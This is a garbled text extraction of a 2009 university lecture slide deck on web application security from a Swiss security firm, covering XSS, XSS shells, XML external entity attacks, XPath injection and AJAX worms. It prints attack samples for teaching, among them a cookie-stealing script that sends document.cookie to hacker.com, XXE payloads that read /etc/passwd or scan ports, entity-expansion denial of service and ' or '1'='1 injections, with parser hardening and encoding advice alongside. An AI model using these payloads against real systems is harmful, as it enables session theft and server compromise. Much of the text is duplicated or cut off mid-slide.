Web Application Security HSR Lektionen - Hacking-Lab...Web Application Security HSR Lektionen Ivan...

Web Application SecurityHSR LektionenHSR Lektionen

Ivan Bütler

Mai 2009

www.csnc.ch

Web Application Security

Tel +41 55-214 41 60Fax +41 55-214 41 [email protected] www.csnc.ch

Compass Security AGGlärnischstrasse 7Postfach 1628CH-8640 Rapperswil

E1 - Who am I

^ Ivan Bütler, Uznach

^ Speaker at Blackhat 2008 Las Vegas

^ Born 31.12.1970

^ Founder of Compass Security AG

© Compass Security AG


^ Founder of Swiss Cyber Storm II

^ Passionate Security Researcher

^ Husband of Cornelia and father of Tim and Nick (2000/2002)

^ Proud Swiss Citizen

^ Speaker at Blackhat 2008 Las Vegas


Slide 2www.csnc.ch


^ Founder of Swiss Cyber Storm II

^ Passionate Security Researcher

^ Husband of Cornelia and father of Tim and Nick (2000/2002)

IT Security is like kayaking

Moving across water


Not moving = losing control!

Continuous

paddling

IT Security is like kayaking

Moving across water

Slide 3www.csnc.ch

Not moving = losing control!

In front of us ....


There are

threats

ahead of us

Slide 4www.csnc.ch

behind us ...

© Compass Security AG Slide 5www.csnc.ch

There are

threats

behind us

Agenda

OWASP Top 10

Cross Site Scripting

AJAX & XML Attacks

Web 2.0 Worm


Web 2.0 Worm

Slide 6www.csnc.ch

OWASP Top 10



OWASP Top 10 (Q4 2007)

A1 Cross Site Scripting

A2 Injection Flaws (SQLi)

A3 Malicious File Execution (RFI)

A4 Insecure Direct Object Reference

A5 Cross Site Request Forgery


A5 Cross Site Request Forgery

A6 Information Leakage

A7 Broken Auth & Session Management

A8 Insecure Cryptographic Storage

A9 Insecure Communications

A10 Failure to restrict URL Access

OWASP Top 10 (Q4 2007)

Malicious File Execution (RFI)

Insecure Direct Object Reference

Cross Site Request Forgery

Slide 8www.csnc.ch

Cross Site Request Forgery

Broken Auth & Session Management

Insecure Cryptographic Storage

Failure to restrict URL Access

A1: Cross Site Scripting

OWASP Definition

XSS flaws occur whenever an application takes user supplied data and sends it to a web browser without first validating or encoding that content. XSS allows attackers to execute script in the victim's browser which can hijack user sessions, deface web sites, possibly introduce worms, etc.


sites, possibly introduce worms, etc.

XSS flaws occur whenever an application takes user supplied data and sends it to a web browser without first validating or encoding that content. XSS allows attackers to execute script in the victim's browser which can hijack user sessions, deface web sites, possibly introduce worms, etc.

Slide 9www.csnc.ch

sites, possibly introduce worms, etc.

Cross-Site ScriptingCross-Site TracingCross-Site TracingSecond Order InjectionHTML Injection

Site Scripting



Second Order Injection

Attack Vector

Protocol


Attrackting!!

JavaScript from

www.abc.com is loaded to

the client (Malware)

Slide 11www.csnc.ch

Authentication into Web Application

Session Hijacking (re-use client session)

JavaScript

JavaScript Malware

JavaScript from

www.abc.com is loaded to



JavaScript Malware

“ Was previously loaded to the web application by the attacker

“ Exploitation of a Cross Site Scripting vulnerability

“ Is part of the „attrackting“ vector

“ HTML formatted mail inlcuding XSS attack vector

“ Obfuscated via URL redirection including XSS attack vector

is loaded to


Slide 12www.csnc.ch

Was previously loaded to the web application by the attacker

Exploitation of a Cross Site Scripting vulnerability

Is part of the „attrackting“ vector

HTML formatted mail inlcuding XSS attack vector

Obfuscated via URL redirection including XSS attack

JavaScript

JavaScript

“ Program that is run client

“ Ususally automates client activities (clicking, etc)

“ Heavily used in Web2.0 (Ajax)

“ Is able to access browser envs (document.cookie)

“ In normal circumstances it is „good code“

“ If used by hackers -> „malicious code“


“ If used by hackers -> „malicious code“

JavaScript Malware

“ Denial of Service attacks

“ Spy the client settings

“ Background http requests to foreign web sites

“ Clicks through an application automatically (add malicous payment instructions)

“ API for the browser and its features

Program that is run client-side

Ususally automates client activities (clicking, etc)

Heavily used in Web2.0 (Ajax)

Is able to access browser envs (document.cookie)

In normal circumstances it is „good code“

> „malicious code“

Slide 13www.csnc.ch

> „malicious code“

Background http requests to foreign web sites

Clicks through an application automatically (add malicous payment

API for the browser and its features

Session Steeling Sequence

Malicious JavaScript performs its own request

Hacker Client

POST /document.jsp?id=898&value=<script>location.href="http://hacker.com/"+document.cookie</script>


GET /session=123

Stores Requestin Log File

Session Steeling Sequence

Malicious JavaScript performs its own request

ClientWeb

Application

POST /document.jsp?id=898&value=<script>location.href="http://hacker.com/"+document.cookie</script>

Stores value

Slide 14www.csnc.ch

GET /app/document.jsp?id=898Cookie: session=123

Response:<script>location.href="http://hacker.com/"

+document.cookie</script>

Stores valuein DB

Testing

Play around with different test strings in request parameters

“ <script>alert('asdf')</script>

“ <script>alert(document.cookie)</script>

“ "<script>alert(document.cookie)</script>

“ "><script>alert(document.cookie)</script>

“ '><script>alert(document.cookie)</script>


'><script>alert(document.cookie)</script>

“ <img src="http://www.bla.com/image.gif" onload="alert(document.cookie)">

In the page returned

“ Search for the presence of test strings

“ Check how the characters get filtered or changed

“ Find out the problem why XSS does not work and try new test strings

Play around with different test strings in request parameters

<script>alert('asdf')</script>

<script>alert(document.cookie)</script>

"<script>alert(document.cookie)</script>

"><script>alert(document.cookie)</script>


Slide 15www.csnc.ch


<img src="http://www.bla.com/image.gif" onload="alert(document.cookie)">

Search for the presence of test strings

Check how the characters get filtered or changed

Find out the problem why XSS does not work and try new test

IFRAME Tag

iframes

“ May contain content of other web sites<iframe src="http://www.csnc.ch/" height="300" width="300"></iframe>


Attacks

“ Faked login dialogs for phishing attacks

“ Retrieval of another page’s content

May contain content of other web sites<iframe src="http://www.csnc.ch/" height="300" width="300"></iframe>

Slide 16www.csnc.ch

Faked login dialogs for phishing attacks

Retrieval of another page’s content

Hacking-Lab

5030 - Cross Site Scripting Lab


Cross Site Scripting Lab

Slide 17www.csnc.ch

Second Order InjectionSecond Order Injection



Introduction

Second-Order Code Injection describes the indirect processing of injected code.

The injected code is not activated immediately by the application.

Primary targets are web applications which are feed with data from other applications.


other applications.

Second-Order Code Injection is caused by missing input validation or missing output encoding.

Order Code Injection describes the indirect processing of

The injected code is not activated immediately by the application.

Primary targets are web applications which are feed with data from

Slide 19www.csnc.ch

Order Code Injection is caused by missing input validation or missing output encoding.

Example

Example


Hacking-Lab

2301 Web Security: Second Order Injection


2301 Web Security: Second Order Injection - Web Services

Slide 21www.csnc.ch

XSS Shell

<script src=......>



XSS Shell – Typical Procedure

User Attacker

<

<script src="http


client requests xss shell code

client loads xss shell code

xss gets persistent

poll for commands

poll for commands

send command

execute command

send results

Typical Procedure

serverxssshellserver

Infect server with persistent XSS

script src="http://xssshellserver/xssshell.asp"></script>

visit server

client receives XSS

http://xssshellserver/xssshell.asp"></script>

Slide 23www.csnc.ch

client requests xss shell code

client loads xss shell code

poll for commands

send command

poll for commands

send command

send results

send results

Manual Proof of XSS Shell

HTTP Request to XSS vulnerable AppGET http://www.csnc.ch/webapp/ HTTP/1.1

Host: www.csnc.ch

Cookie:

CSNC=8iLksLJJpgMB4Zl7MpvjKg2ypbiFEY1wPJl8hUjoh49Z3UNFiddu7YSC4THilnP

HTTP Response from XSS vulnerable AppHTTP/1.0 200 OK


...

<script src="http://www.google.ch/ivan.js

...

HTTP Request to XSS Shell ServerGET http://www.google.ch/ivan.js HTTP/1.1

Host: www.google.ch

HTTP Response from XSS Shell ServerHTTP/1.0 200 OK

alert(document.cookie);

Manual Proof of XSS Shell

HTTP Request to XSS vulnerable AppGET http://www.csnc.ch/webapp/ HTTP/1.1

CSNC=8iLksLJJpgMB4Zl7MpvjKg2ypbiFEY1wPJl8hUjoh49Z3UNFiddu7YSC4THilnP

HTTP Response from XSS vulnerable AppJava Script loaded

from XSS Shell

Slide 24www.csnc.ch

script src="http://www.google.ch/ivan.js"></script>

HTTP Request to XSS Shell ServerGET http://www.google.ch/ivan.js HTTP/1.1

HTTP Response from XSS Shell Server

from XSS Shell

Server can access

Cookies from

Vulnerable App

XSS Shell


XSS Tunnel

Used as local proxy

Tunnels traffic over victim connected to xss


Tunnels traffic over victim connected to xss-shell

Slide 26www.csnc.ch

XSS Tunnel sequence diagram

Attacker XSS Tunnel Vulu

Post blog entry


Request to local proxy

Show respond

XSS Tunnel sequence diagram

Vulu. appl. Victim XSS-Shell

Read blog entry

Get script

Begin polling comands

from xss-shell

Poll for commands

Slide 27www.csnc.ch

Poll for commands

Poll for command

Send commands to xss-shell

Send command

Return respond

Forward respond to xss tunnel client

Request to vulu. appl.

Response from appl.

XSS Shell

XSS Shell

“ Tested with: Firefox, IE6 and IE7

“ Works with persistent XSS or reflected (temporary) XSS

“ XSS Shell communication relies on remote JavaScript

“ loading via <script src=„..“>

“ bypass the same-origin policy


bypass the same-origin policy

“ XSS Shell is Open Source

Tested with: Firefox, IE6 and IE7

Works with persistent XSS or reflected (temporary) XSS

XSS Shell communication relies on remote JavaScript

loading via <script src=„..“>

origin policy

Slide 28www.csnc.ch

origin policy

XSS Shell is Open Source

References

XSS Shell & XSS Tunnelhttp://www.portcullis-security.com/


security.com/

Slide 29www.csnc.ch

Hacking-Lab

2650 RSS Attack and XSSShell


XSSShell

Slide 30www.csnc.ch

AJAX & XML SecurityAJAX & XML Security



AJAX Request/Response


Source: Wikipedia

AJAX Request/Response

New engineNew engineNew engineNew engine built-in

newer browsers!

Interactive GUIInteractive GUIInteractive GUIInteractive GUI

Asynchronous Asynchronous Asynchronous Asynchronous

processingprocessingprocessingprocessing ; not every

Slide 32www.csnc.ch

processingprocessingprocessingprocessing ; not every

action needs to be

started by pressing the

submit button

Asynchronous Asynchronous Asynchronous Asynchronous

processingprocessingprocessingprocessing ; AJAX

updates the browser

window (content)

XMLHttpRequest (XHR)

XmlHttpRequest is a browser API to perform background HTTP requests from JavaScript

Invented by Microsoft in 2000

IE 5.0 / 6.0: COM/ActiveX object „Microsoft.XmlHttp“

“ ActiveX must be enabled


“ ActiveX must be enabled

IE 7.0, Firefox, Opera, Safari and other browsers:Native JavaScript object „XmlHttpRequest“

“ ActiveX not required

“ Portable

XmlHttpRequest is a browser API to perform background HTTP

Invented by Microsoft in 2000

IE 5.0 / 6.0: COM/ActiveX object „Microsoft.XmlHttp“

ActiveX must be enabled

Slide 33www.csnc.ch

ActiveX must be enabled

IE 7.0, Firefox, Opera, Safari and other browsers:Native JavaScript object „XmlHttpRequest“

XMLHttpRequest (XHR)


Data Exchange Formats

Upstream Data Format


Downstream Data Format

Data Format

Slide 35www.csnc.ch

Data Format

Upstream Data Formats

Possible data formats:

“ GET parameters

“ POST parameters

“ XML

“ SOAP

Some server-side API is provided


Some server-side API is provided

Often maps to server-side objects and their functions

“ AJAX calls in this case are like remote method invocations

side API is provided

Slide 36www.csnc.ch

side API is provided

side objects and their functions

AJAX calls in this case are like remote method invocations

Upstream: HTTP GET Parameters

GET /dyn/req?call=foo


GET /dyn/req?call=foo

...

: HTTP GET Parameters

call=foo&arg=bar HTTP/1.1

Slide 37www.csnc.ch

call=foo&arg=bar HTTP/1.1

Upstream: HTTP POST Parameters


POST /dyn/req HTTP/1.1

Content-Type: application/

...

call=foo&arg=bar

: HTTP POST Parameters

Slide 38www.csnc.ch

/dyn/req HTTP/1.1

Type: application/x-www-form-urlencoded

Upstream: XML




Content-Type: text/xml

...

<?xml version="1.0" encoding="utf

<request connectionId="cxooiqM">

<call type="foo">

<argument name="

</call>

</request>

/dyn/req HTTP/1.1

Slide 39www.csnc.ch

/dyn/req HTTP/1.1

text/xml

<?xml version="1.0" encoding="utf-8"?>

connectionId="cxooiqM">

">

name="bar">true</argument>

Upstream: SOAP




Content-Type: application/soap

...


<Envelope xmlns="http://schemas.xmlsoap.org

<Body>

...

</Body>

</Envelope>

/dyn/req HTTP/1.1

Slide 40www.csnc.ch

/dyn/req HTTP/1.1

application/soap-xml


xmlns="http://schemas.xmlsoap.org

/soap/envelope">

Downstream: XML

HTTP/1.1 200 OK


HTTP/1.1 200 OK

Content-Type: text/xml

...


<response>

<result type="login

<status>false</status

<msg>Username or password invalid.<

</result>

</response>

Slide 41www.csnc.ch

text/xml


login">

/status>

>Username or password invalid.</msg>

Downstream: JavaScript

HTTP/1.1 200 OK


HTTP/1.1 200 OK

Content-Type: text/javascript

...

LibJs.user='nobody';

LibJs.groups=['member','nobody','wnc5Xh'];

$L('kYP64i').__render([$E('h1',{className:

'Compiled',attributes:{},children:[$T(LibJ

s.Compiler.fromAscii('Hello world!'))] ...

LibJs.Server.__onComplete(1664);

: JavaScript

Slide 42www.csnc.ch

text/javascript

LibJs.user='nobody';

LibJs.groups=['member','nobody','wnc5Xh'];

$L('kYP64i').__render([$E('h1',{className:

'Compiled',attributes:{},children:[$T(LibJ

s.Compiler.fromAscii('Hello world!'))] ...

LibJs.Server.__onComplete(1664);

Downstream: JSON

HTTP/1.1 200 OK


HTTP/1.1 200 OK

Content-Type: text/x-

...

{"menu": {

"id": "file",

"popup": {

"menuitem": [

{"value": "New", "onclick": "NewDoc()"},

{"value": "Open", "onclick": "OpenDoc()"},

{"value": "Close", "onclick": "CloseDoc()"}

]}}}

Slide 43www.csnc.ch

-json

{"value": "New", "onclick": "NewDoc()"},

{"value": "Open", "onclick": "OpenDoc()"},

{"value": "Close", "onclick": "CloseDoc()"}

Downstream: Custom

HTTP/1.1 200 OK


HTTP/1.1 200 OK

Content-Type: text/x

...

{OK}["53723","84268","78357","27843"]

Slide 44www.csnc.ch

text/x-gwt

{OK}["53723","84268","78357","27843"]

XML Attack VectorXML Attack Vector



Attack Targets

Possible attack targets

“ network service“ XML generator“ XML parser“ application code


Conclusion“ XML core security

standards are onlyof limited value whenthe XML generator orparser is the target ofthe attack.

“ Therefore additionalprotection is required.

Slide 46www.csnc.ch

XML Parser AttacksXML Parser Attacks



XML Parser Attacks

XML technology allows to offload the marshaling issues

“ No custom serialization protocols required

“ Generic approach to handle different data structures

“ Easy transformation of XML documents into business objects

Therefore XML parsers are very powerful



“ highly generic

“ highly dynamic

This is the foundation for XML parser based attacks!

XML technology allows to offload the marshaling issues

No custom serialization protocols required

Generic approach to handle different data structures

Easy transformation of XML documents into business objects


Slide 48www.csnc.ch


This is the foundation for XML parser based attacks!

XML Parser: Verbose Error Messages

Often XML parsers return very verbose information about occurred problems

“ Schema definitions and the location where the parsing error has occurred.

“ Java Stack Traces or parts of it


<error>

<message>

XMLParserError: Error on line 3: cvc

type.2.4.b: The content of element 'header' is not

complete. It must match '(((((((("":senderid),

"":reference)), ("":receipientid){0

</message>

</error>

XML Parser: Verbose Error Messages

Often XML parsers return very verbose information about occurred

Schema definitions and the location where the parsing error

Java Stack Traces or parts of it

Slide 49www.csnc.ch

XMLParserError: Error on line 3: cvc-complex-

type.2.4.b: The content of element 'header' is not

It must match '(((((((("":senderid),

"":reference)), ("":receipientid){0-1}),...'.

XML Parser: Overlong XML Documents

Although recursive entity definitions are not allowed by XML overlong documents can still be constructed

<?xml version="1.0" encoding ="UTF

<!DOCTYPE sample [<!ENTITY x100 “A very CPU consuming task :)"><!ENTITY x99 "&x100;&x100;">...


...<!ENTITY x1 "&x2;&x2;">

]>

<SOAP-ENV:Envelope xmlns:SOAP<SOAP-ENV:Body>

<ns1:aaa xmlns:ns1="urn:aaa" SOAP

<sample xsi:type="xsd:string"></ns1:aaa>

</SOAP-ENV:Body>

</SOAP-ENV:Envelope>


Although recursive entity definitions are not allowed by XML overlong documents can still be constructed

<?xml version="1.0" encoding ="UTF-8"?>

<!ENTITY x100 “A very CPU consuming task :)"><!ENTITY x99 "&x100;&x100;">

Slide 50www.csnc.ch

<!ENTITY x1 "&x2;&x2;">

ENV:Envelope xmlns:SOAP-ENV=...>

<ns1:aaa xmlns:ns1="urn:aaa" SOAP-ENV=...>

<sample xsi:type="xsd:string">&x1;</sample>


Attack on DOM parser

<?xml version="1.0" encoding ="UTF

<dom-attack>

<dom-attack>

<dom-attack>


<dom-attack>

<dom-attack>

<dom-attack>

<dom-attack>...</dom

</dom-attack>

</dom-attack>

</dom-attack>

</dom-attack>

</dom-attack>


<?xml version="1.0" encoding ="UTF-8"?>

Slide 51www.csnc.ch

attack>

attack>...</dom-attack>

attack>

XML Parser: XXE

XXE à XML External Entity Attacks

Attack Range

“ DoS – Denial of Service Attacks

“ Inclusion of local files into XML documents

“ Port scanning from the system where the XML parser is located

“ Overloading of XML-Schema from foreign locations


“ Overloading of XML-Schema from foreign locations

ntity Attacks

Denial of Service Attacks

Inclusion of local files into XML documents

Port scanning from the system where the XML parser is located

Schema from foreign locations

Slide 52www.csnc.ch

Schema from foreign locations

XML Parser: XXE Denial of Service

Denial of Service

“ Loading of content from local devices like /dev/zero

<?xml version="1.0" encoding="ISO

<!DOCTYPE sample SYSTEM

...


...

XML Parser: XXE Denial of Service

Loading of content from local devices like /dev/zero

<?xml version="1.0" encoding="ISO-8859-1"?>

SYSTEM "/dev/zero">

Slide 53www.csnc.ch

XML Parser: XXE Local Connect Scan

Using external DTD references it is possible to perform TCP port scans.

Request<?xml version="1.0" encoding="ISO

<!DOCTYPE sample PUBLIC

...


Response<?xml version="1.0" encoding="ISO

<error>

<type>FATAL</type>

<message>

XMLParserError: Error in building: Connection refused

</message>

</error>

XML Parser: XXE Local Connect Scan

Using external DTD references it is possible to perform TCP port


PUBLIC "..." "http://localhost:99">

Slide 54www.csnc.ch


XMLParserError: Error in building: Connection refused

XML Parser: XXE DNS Resolution


<!DOCTYPE sample PUBLIC "..." "

...




<error>

<type>FATAL</type>

<message>

XMLParserError: Error in building: Host not found:

www.csnc.ch

</message>

</error>

XML Parser: XXE DNS Resolution


<!DOCTYPE sample PUBLIC "..." "http://www.csnc.ch:99">


Slide 55www.csnc.ch


XMLParserError: Error in building: Host not found:

XML Parser: XXE Global Connect Scan


<!DOCTYPE sample PUBLIC

...




<error>

<type>FATAL</type>

<message>

XMLParserError: Error in building: Connection timeout

</message>

</error>

XML Parser: XXE Global Connect Scan


PUBLIC "..." "http://www.google.com">


Slide 56www.csnc.ch


XMLParserError: Error in building: Connection timeout

XML Parser: XXE File Inclusion

DTD allows the inclusion of documents

“ XML documents“ web.xml

“ Any other file (difficult since XML parsers often require the content to be parseable)“ /etc/passwd

Request



<!DOCTYPE request [

<!ENTITY include SYSTEM "/etc/passwd"

]>

<request>

<description>&include;

...

</request>

XML Parser: XXE File Inclusion

DTD allows the inclusion of documents

Any other file (difficult since XML parsers often require the content to be parseable)

Slide 57www.csnc.ch


include SYSTEM "/etc/passwd">

&include;</description>

XML Parser: Example

Request


<!DOCTYPE request [

<!ENTITY include SYSTEM “file=/etc/passwd"

]>

<request>


<request>

<description>&include;

...

</request>

XML

Response


include SYSTEM “file=/etc/passwd">

Slide 58www.csnc.ch

&include;</description>

root:x:0:0:root:/root:/bin/bash

daemon:x:1:1:daemon:/usr/sbin:/bin/sh

bin:x:2:2:bin:/bin:/bin/sh

sys:x:3:3:sys:/dev:/bin/sh

sync:x:4:65534:sync:/bin:/bin/sync

games:x:5:60:games:/usr/games:/bin/sh

man:x:6:12:man:/var/cache/man:/bin/sh

lp:x:7:7:lp:/var/spool/lpd:/bin/sh

mail:x:8:8:mail:/var/mail:/bin/sh

news:x:9:9:news:/var/spool/news:/bin/sh

XML Parser: External XML Schema

XML schemas can be stored remote

Request<soapenv:Envelope

xmlns:soapenv="http://schemas.xmlsoap.org/soap..."

xmlns:xsd="http://www.w3.org/2001/XMLSchema"

xmlns:xsi="http://www.w3.org/2001/XMLSchema


xmlns:xsi="http://www.w3.org/2001/XMLSchema

xsi:schemaLocation="http://schemas.xmlsoap.org/so.../

http://www.hacker.com/hack.txt">

<soapenv:Body>

...

</soapenv:Body>

</soapenv:Envelope>

Space characterrequired

XML Parser: External XML Schema

XML schemas can be stored remote

xmlns:soapenv="http://schemas.xmlsoap.org/soap..."

xmlns:xsd="http://www.w3.org/2001/XMLSchema"

xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance“

Slide 59www.csnc.ch

xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance“

xsi:schemaLocation="http://schemas.xmlsoap.org/so.../

http://www.hacker.com/hack.txt">

Hacking-Lab

2600 XML Attacks


Mitigation XML AttacksXerces HardeningXerces HardeningMitigation XML Attacks



Xerces Hardening

All previous attacks are the result of weakly configured XML parsers.

To be secure against these attacks the XML parsers need to be hardened.


Hardening is a term which describes a process where a component is setup in the most minimal and secure configuration required to run the application.

All previous attacks are the result of weakly configured

To be secure against these attacks the XML parsers need to be hardened.

Slide 62www.csnc.ch

is a term which describes a process where a component is setup in the most minimal and secure configuration required to run the application.

The parser can be configured as follows

SAXParser p = new SAXParser();

p.setFeature("...", true|false);

Validate schemas featureshttp://xml.org/sax/features/validation

Xerces Hardening


http://xml.org/sax/features/validation

http://xml.org/sax/features/namespace

http://xml.org/sax/features/namespaces

http://apache.org/xml/features/validation/schema

http://apache.org/xml/features/validation/schema

àààà true

The parser can be configured as follows

SAXParser p = new SAXParser();

p.setFeature("...", true|false);

http://xml.org/sax/features/validation àààà true

Slide 63www.csnc.ch

http://xml.org/sax/features/validation àààà true

http://xml.org/sax/features/namespace-prefixes àààà true

http://xml.org/sax/features/namespaces àààà true

http://apache.org/xml/features/validation/schema àààà true

http://apache.org/xml/features/validation/schema-full-checking

Xerces Hardening

Avoid external entity attackshttp://xml.org/sax/features/external

http://xml.org/sax/features/externalfalse

http://apache.org/xml/features/disallow

Avoid resolving of external XML schema locations


Avoid resolving of external XML schema locationsp.setEntityResolver(new MyResolver()

Utilize Security Manager to limit number of nodes and entity expansionsp.setProperty("http://apache.org/xml/properties/security-manager", "org.apache.xerces.util.SecurityManager"

Check XML against local server

http://xml.org/sax/features/external-general-entities à false

http://xml.org/sax/features/external-parameter-entities à

http://apache.org/xml/features/disallow-doctype-decl à true

Avoid resolving of external XML schema locations

Slide 64www.csnc.ch

Avoid resolving of external XML schema locationsnew MyResolver());

Utilize Security Manager to limit number of nodes and entity

("http://apache.org/xml/properties/securit"org.apache.xerces.util.SecurityManager");

Check XML against local server-side schemas and DTDs

XPath Injection



Introduction

Just like relational databases XML documents need to be queried for information.

To provide a standardized means for querying XML documents XPath is used.


XPath is used.

XPath is a basic XML technology is the foundation for other technologies, like

“ XSLT

“ XQuery

Just like relational databases XML documents need to be queried

To provide a standardized means for querying XML documents

Slide 66www.csnc.ch

XPath is a basic XML technology is the foundation for other

XPath

Lets assume following XML document used as a repository for user accounts and their passwords...


<users>

<user>

<username>monsch</username>



<password>V3riKomplikatet</password>

</user>

<user>

<username>buetler</username>

<password>$eCur1tY</password>

</user>

</users>

Lets assume following XML document used as a repository for user accounts and their passwords...



Slide 67www.csnc.ch


<password>V3riKomplikatet</password>

<username>buetler</username>

<password>$eCur1tY</password>

XPath

... and an application using this XML document to perform authentication using XPath expressions.

//users/user[

username/text()='

password/text()='

]


]

The red marked strings are the ones embedded from the login form.

But wait?

“ Doesn't this resemble SQL Injection attacks?

... and an application using this XML document to perform authentication using XPath expressions.

username/text()='monsch' and

password/text()='V3riKomplikatet'

Slide 68www.csnc.ch

The red marked strings are the ones embedded from the login

Doesn't this resemble SQL Injection attacks?

XPath Injection



XPath Injection

Yes it does!

Unvalidated input parameters can lead to a XPath Injection attack.

//users/user[


//users/user[

username/text()='monsch

password/text()='' or '1'='1

]

This query selects all user nodes within the XML document.

Unvalidated input parameters can lead to a XPath Injection attack.

Slide 70www.csnc.ch

monsch' and

' or '1'='1'

This query selects all user nodes within the XML document.

XPath Injection

XPath Injection

' or '1'='1


XPath Injection

But if the application tests the number of returned results it probably wont work!

To get a more targeted attack an educated guess can be made about the name of the username node.


about the name of the username node.

This way the attack can be launched against a specific user

//users/user[


password/text()='' or '1'='1' and


]

But if the application tests the number of returned results it

To get a more targeted attack an educated guess can be made about the name of the username node.

Slide 72www.csnc.ch

about the name of the username node.

This way the attack can be launched against a specific user

monsch' and

' or '1'='1' and

username/text()='monsch'

XPath Injection

XPath Injection

' or '1'='1' and




Slide 73www.csnc.ch

AJAX Worms AnalysisAJAX Worms Analysis



Meebo Worm Movie

http://milw0rm.org/video/watch.php?id=71


http://milw0rm.org/video/watch.php?id=71

Slide 75www.csnc.ch

What is meebo.com

Meebo is a web2.0 (AJAX) based instant messaging platform

Users can chat with each other over a web client


Meebo is a web2.0 (AJAX) based instant messaging platform

Users can chat with each other over a web client

Slide 76www.csnc.ch

Meebo.com Vulnerabilities

The messaging functionality is vulnerable to Cross(XSS)

The following script is executed:

<HTML>yo<SCRIPT

a=„>‘>“>alert(‚XSS‘);</SCRIPT></HTML>


This vulnerability could be used to steal session cookies,... (typical Web1.0 XSS Case)

It can also be used to code a worm, that propagates over the messaging functionality

Meebo.com Vulnerabilities

The messaging functionality is vulnerable to Cross-Site-Scripting

The following script is executed:

a=„>‘>“>alert(‚XSS‘);</SCRIPT></HTML>

Slide 77www.csnc.ch

This vulnerability could be used to steal session cookies,... (typical

It can also be used to code a worm, that propagates over the

Impact

XSS Worm propagates without user input.

Availability of meebo.com can be affected

An attacker could gather session cookies

0-Day Exploits can be distributed by XSS


0-Day Exploits can be distributed by XSS

XSS Worm propagates without user input.

Availability of meebo.com can be affected

An attacker could gather session cookies

Day Exploits can be distributed by XSS-Worms

Slide 78www.csnc.ch

Day Exploits can be distributed by XSS-Worms

Propagation

Friendship


Friendship

Slide 79www.csnc.ch

Propagation

Step 1: initial Message

“ A sends infected Message to B

Step 2: Javascript is Executed

“ Javascript is executed on B“ The script looks for all buddies from B and looks for itself in the

HTML document.


HTML document.

Step 3: Javascript is sent to buddies from B

“ All Buddies from B (including A) get the infected message

Step 4: Javascript is executed

“ Javascript is executed on A,C,D“ The script looks for all buddies and sends itself to these

Step 5:....

A sends infected Message to B

Step 2: Javascript is Executed

Javascript is executed on BThe script looks for all buddies from B and looks for itself in the

Slide 80www.csnc.ch

Step 3: Javascript is sent to buddies from B

All Buddies from B (including A) get the infected message

Step 4: Javascript is executed

Javascript is executed on A,C,DThe script looks for all buddies and sends itself to these

Analyzing the Worm Code


Analyzing the Worm Code

Payload, this would be the malware. Just a simple „infected by“ alert box

Get Script from window and close window.After closing window, return the script

Slide 81www.csnc.ch

Gets all buddies (gBuddyList) and sends the result from getScriptSelfAndClose to every buddy

First step: propagationsecond step: infection

Solution

This problem is the same, like in known XSS

Always perform Output Encoding.

“ < à <

“ > à >

“ & à &

“ ...


“ ...

As a second priority perform Input Filtering of dangerous characters such as: <, >, ", ', &, %

This problem is the same, like in known XSS-vulnerable applications

Always perform Output Encoding.

Slide 82www.csnc.ch

As a second priority perform Input Filtering of dangerous <, >, ", ', &, %

Other popular XSS Worms

Yamanner Worm (June 2006)

“ Yahoo Webmail infected.

“ Read out users contacts and sent itself to these

“ Sent all contacts to the author of the worm

Samy Worm (October 2005)

“ Also called the myspace worm


“ Also called the myspace worm

“ Added the words „Samy is my hero“ to the victims profile

“ Spread by viewing profile of a victim. If a user viewed the profile of a victim, he became also a victim

Other popular XSS Worms

Yamanner Worm (June 2006)

Yahoo Webmail infected.

Read out users contacts and sent itself to these

Sent all contacts to the author of the worm

Also called the myspace worm

Slide 83www.csnc.ch

Also called the myspace worm

Added the words „Samy is my hero“ to the victims profile

Spread by viewing profile of a victim. If a user viewed the profile of a victim, he became also a victim

Samy Worm

In October 2005 the samy worm took down myspace.com

Myspace is not an AJAX application

The Samy Worm parsed the data it needed from the websites.

Approximately 1‘000‘000 myspace users were infected in 20


Approximately 1‘000‘000 myspace users were infected in 20 hours

„But most of all, samy is my hero“ was written on every infected profile

In October 2005 the samy worm took down myspace.com

Myspace is not an AJAX application

The Samy Worm parsed the data it needed from the websites.


Slide 84www.csnc.ch


Samy Worm

The worm performed 5 steps for every user

“ Fetch victims profile

“ Update victims profile

“ Confirm profile update

“ Invite samy as a friend

“ Confirm samy invitation


Confirm samy invitation

Problem was solved by output encoding

There are still infected profiles with the words „but most of all, sammy is my hero“ and the encoded javascript code on it.

“ Google: „but most of all, samy is my hero“ site:myspace.com

The worm performed 5 steps for every user

Confirm profile update


Slide 85www.csnc.ch


Problem was solved by output encoding

There are still infected profiles with the words „but most of all, sammy is my hero“ and the encoded javascript code on it.

Google: „but most of all, samy is my hero“ site:myspace.com

Compass Security AG

Compass Security Network Computing

Postfach 1628

Glärnischstrasse 7

CH - 8640 Rapperswil

[email protected] | www.csnc.ch | +41 55 214 41 60

Secure File Exchange: www.csnc.ch/filebox

PGP-Fingerprint:


[email protected] | www.csnc.ch | +41 55 214 41 60

Slide 86www.csnc.ch

Web Application Security HSR Lektionen - Hacking-Lab...Web Application Security HSR Lektionen Ivan...

Documents

Transcript of Web Application Security HSR Lektionen - Hacking-Lab...Web Application Security HSR Lektionen Ivan...